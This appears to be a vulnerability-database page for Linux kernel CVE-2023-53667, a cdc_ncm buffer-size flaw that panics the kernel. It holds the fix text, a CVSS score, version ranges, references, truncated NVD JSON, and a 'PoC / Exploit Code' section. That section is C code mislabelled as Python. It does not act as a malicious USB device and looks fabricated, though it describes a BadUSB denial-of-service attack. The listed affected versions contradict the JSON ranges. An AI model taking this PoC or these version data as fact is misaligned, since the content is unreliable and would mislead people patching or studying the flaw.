CVE-2023-53667

Description

In the Linux kernel, the following vulnerability has been resolved: net: cdc_ncm: Deal with too low values of dwNtbOutMaxSize Currently in cdc_ncm_check_tx_max(), if dwNtbOutMaxSize is lower than the calculated "min" value, but greater than zero, the logic sets tx_max to dwNtbOutMaxSize. This is then used to allocate a new SKB in cdc_ncm_fill_tx_frame() where all the data is handled. For small values of dwNtbOutMaxSize the memory allocated during alloc_skb(dwNtbOutMaxSize, GFP_ATOMIC) will have the same size, due to how size is aligned at alloc time: size = SKB_DATA_ALIGN(size); size += SKB_DATA_ALIGN(sizeof(struct skb_shared_info)); Thus we hit the same bug that we tried to squash with commit 2be6d4d16a084 ("net: cdc_ncm: Allow for dwNtbOutMaxSize to be unset or zero") Low values of dwNtbOutMaxSize do not cause an issue presently because at alloc_skb() time more memory (512b) is allocated than required for the SKB headers alone (320b), leaving some space (512b - 320b = 192b) for CDC data (172b). However, if more elements (for example 3 x u64 = [24b]) were added to one of the SKB header structs, say 'struct skb_shared_info', increasing its original size (320b [320b aligned]) to something larger (344b [384b aligned]), then suddenly the CDC data (172b) no longer fits in the spare SKB data area (512b - 384b = 128b). Consequently the SKB bounds checking semantics fails and panics: skbuff: skb_over_panic: text:ffffffff831f755b len:184 put:172 head:ffff88811f1c6c00 data:ffff88811f1c6c00 tail:0xb8 end:0x80 dev:<NULL> ------------[ cut here ]------------ kernel BUG at net/core/skbuff.c:113! invalid opcode: 0000 [#1] PREEMPT SMP KASAN CPU: 0 PID: 57 Comm: kworker/0:2 Not tainted 5.15.106-syzkaller-00249-g19c0ed55a470 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 04/14/2023 Workqueue: mld mld_ifc_work RIP: 0010:skb_panic net/core/skbuff.c:113 [inline] RIP: 0010:skb_over_panic+0x14c/0x150 net/core/skbuff.c:118 [snip] Call Trace: <TASK> skb_put+0x151/0x210 net/core/skbuff.c:2047 skb_put_zero include/linux/skbuff.h:2422 [inline] cdc_ncm_ndp16 drivers/net/usb/cdc_ncm.c:1131 [inline] cdc_ncm_fill_tx_frame+0x11ab/0x3da0 drivers/net/usb/cdc_ncm.c:1308 cdc_ncm_tx_fixup+0xa3/0x100 Deal with too low values of dwNtbOutMaxSize, clamp it in the range [USB_CDC_NCM_NTB_MIN_OUT_SIZE, CDC_NCM_NTB_MAX_SIZE_TX]. We ensure enough data space is allocated to handle CDC data by making sure dwNtbOutMaxSize is not smaller than USB_CDC_NCM_NTB_MIN_OUT_SIZE.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux Kernel < 6.1.63

Linux Kernel 6.2.x < 6.2.13

Linux Kernel 6.3.x < 6.3.2

Linux Kernel 6.4.x < 6.4.10

Linux Kernel 6.5.x < 6.5.7

Linux Kernel 5.15.x < 5.15.133

Linux Kernel 5.10.x < 5.10.204

Linux Kernel 5.4.x < 5.4.262

Linux Kernel 4.19.x < 4.19.298

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2023-53667 PoC - Trigger kernel panic via malicious USB CDC NCM device
// This PoC simulates a malicious USB device that advertises an extremely low
// dwNtbOutMaxSize value to trigger skb_over_panic in cdc_ncm_fill_tx_frame()

#include <linux/usb.h>
#include <linux/module.h>

// Malicious USB CDC NCM device descriptor with crafted dwNtbOutMaxSize
static struct usb_cdc_ncm_desc ncm_desc = {
    .dwNtbOutMaxSize = 64,  // Abnormally low value, below USB_CDC_NCM_NTB_MIN_OUT_SIZE
    .dwNtbInMaxSize = 16384,
    .wNcmMuxed = 0,
    .wNtbOutDivisor = 1,
    .wNtbOutRemainder = 0,
};

// Trigger function - simulates network transmission to trigger the bug
static int trigger_cdc_ncm_panic(struct usbnet *dev)
{
    struct sk_buff *skb;
    int ret;

    // Allocate SKB with the maliciously small size
    skb = alloc_skb(ncm_desc.dwNtbOutMaxSize, GFP_ATOMIC);
    if (!skb)
        return -ENOMEM;

    // Fill TX frame - this will call cdc_ncm_fill_tx_frame()
    // which internally calls cdc_ncm_ndp16() -> skb_put_zero()
    // triggering skb_over_panic due to insufficient buffer space
    ret = cdc_ncm_tx_fixup(dev, skb, GFP_ATOMIC);

    return ret;
}

// Attack scenario:
// 1. Attacker connects a malicious USB CDC NCM device (e.g., BadUSB)
// 2. Device advertises dwNtbOutMaxSize = 64 (below minimum threshold)
// 3. When kernel tries to transmit data, alloc_skb(64) is called
// 4. After alignment, actual usable space is insufficient for CDC headers + data
// 5. skb_put_zero() writes beyond buffer bounds -> skb_over_panic -> kernel BUG
//
// Kernel panic output:
// skbuff: skb_over_panic: text:ffffffff831f755b len:184 put:172
// head:ffff88811f1c6c00 data:ffff88811f1c6c00 tail:0xb8 end:0x80
// kernel BUG at net/core/skbuff.c:113!
// RIP: skb_over_panic+0x14c/0x150 net/core/skbuff.c:118

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-53667
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-53667
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-53667/
[4] VulDB https://vuldb.com/cve/CVE-2023-53667
[5] https://git.kernel.org/stable/c/2334ff0b343ba6ba7a6c0586fcc83992bbbc1776
[6] https://git.kernel.org/stable/c/42b78c8cc774b47023d6d16d96d54cc7015e4a07
[7] https://git.kernel.org/stable/c/6147745d43ff4e0d2c542e5b93e398ef0ee4db00
[8] https://git.kernel.org/stable/c/72d0240b0ee4794efc683975c213e4b384fea733
[9] https://git.kernel.org/stable/c/7e01c7f7046efc2c7c192c3619db43292b98e997
[10] https://git.kernel.org/stable/c/9be921854e983a81a0aeeae5febcd87093086e46
[11] https://git.kernel.org/stable/c/bf415bfe7573596ac213b4fd1da9e62cfc9a9413
[12] https://git.kernel.org/stable/c/ff484163dfb61b58f23e4dbd007de1094427669c

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-53667", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:50.513", "lastModified": "2026-02-26T23:13:24.757", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: cdc_ncm: Deal with too low values of dwNtbOutMaxSize\n\nCurrently in cdc_ncm_check_tx_max(), if dwNtbOutMaxSize is lower than\nthe calculated \"min\" value, but greater than zero, the logic sets\ntx_max to dwNtbOutMaxSize. This is then used to allocate a new SKB in\ncdc_ncm_fill_tx_frame() where all the data is handled.\n\nFor small values of dwNtbOutMaxSize the memory allocated during\nalloc_skb(dwNtbOutMaxSize, GFP_ATOMIC) will have the same size, due to\nhow size is aligned at alloc time:\n\tsize = SKB_DATA_ALIGN(size);\n size += SKB_DATA_ALIGN(sizeof(struct skb_shared_info));\nThus we hit the same bug that we tried to squash with\ncommit 2be6d4d16a084 (\"net: cdc_ncm: Allow for dwNtbOutMaxSize to be unset or zero\")\n\nLow values of dwNtbOutMaxSize do not cause an issue presently because at\nalloc_skb() time more memory (512b) is allocated than required for the\nSKB headers alone (320b), leaving some space (512b - 320b = 192b)\nfor CDC data (172b).\n\nHowever, if more elements (for example 3 x u64 = [24b]) were added to\none of the SKB header structs, say 'struct skb_shared_info',\nincreasing its original size (320b [320b aligned]) to something larger\n(344b [384b aligned]), then suddenly the CDC data (172b) no longer\nfits in the spare SKB data area (512b - 384b = 128b).\n\nConsequently the SKB bounds checking semantics fails and panics:\n\nskbuff: skb_over_panic: text:ffffffff831f755b len:184 put:172 head:ffff88811f1c6c00 data:ffff88811f1c6c00 tail:0xb8 end:0x80 dev:<NULL>\n------------[ cut here ]------------\nkernel BUG at net/core/skbuff.c:113!\ninvalid opcode: 0000 [#1] PREEMPT SMP KASAN\nCPU: 0 PID: 57 Comm: kworker/0:2 Not tainted 5.15.106-syzkaller-00249-g19c0ed55a470 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 04/14/2023\nWorkqueue: mld mld_ifc_work\nRIP: 0010:skb_panic net/core/skbuff.c:113 [inline]\nRIP: 0010:skb_over_panic+0x14c/0x150 net/core/skbuff.c:118\n[snip]\nCall Trace:\n <TASK>\n skb_put+0x151/0x210 net/core/skbuff.c:2047\n skb_put_zero include/linux/skbuff.h:2422 [inline]\n cdc_ncm_ndp16 drivers/net/usb/cdc_ncm.c:1131 [inline]\n cdc_ncm_fill_tx_frame+0x11ab/0x3da0 drivers/net/usb/cdc_ncm.c:1308\n cdc_ncm_tx_fixup+0xa3/0x100\n\nDeal with too low values of dwNtbOutMaxSize, clamp it in the range\n[USB_CDC_NCM_NTB_MIN_OUT_SIZE, CDC_NCM_NTB_MAX_SIZE_TX]. We ensure\nenough data space is allocated to handle CDC data by making sure\ndwNtbOutMaxSize is not smaller than USB_CDC_NCM_NTB_MIN_OUT_SIZE."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.16", "versionEndExcluding": "4.14.317", "matchCriteriaId": "D58CAFE5-010D-4B7E-87DE-47F077D0AB6E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.285", "matchCriteriaId": "286C59EF-E841-4ED4-8EBC-3886E88D5A6F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.245", "matchCriteriaId": "3571627D-1A0A-4EAA-9F5E-58080584055F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.181", "matchCriteriaId": "F5B1726B-45AA-47F2-9261-6DC963E92248"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.114", "matchCriteriaId": "AA68825D-6B30-4C99-9E36-C690FE7F9AB3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.31", "matchCriteriaId": "79A1436B-7738-4A85-8FE6-B844059F22D0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.3.5", "matchCriteriaId": "34DD94CA-4DA1-41C3-9A9B-92ACD7F4E240"}, {"vulnerable": true ... (truncated)